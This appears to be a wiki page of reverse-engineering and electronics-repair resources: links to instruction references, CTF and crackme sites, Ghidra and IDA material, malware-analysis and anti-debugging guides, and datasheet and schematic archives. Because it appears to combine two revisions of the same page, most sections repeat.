::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2026-02-10T19:08:01Z

Polymorphic7: Catch up a caugh. Exam failed.

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2026-02-10T19:02:03Z

Polymorphic7: Not often do I caugh a gammer mistake made by myself. gg

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

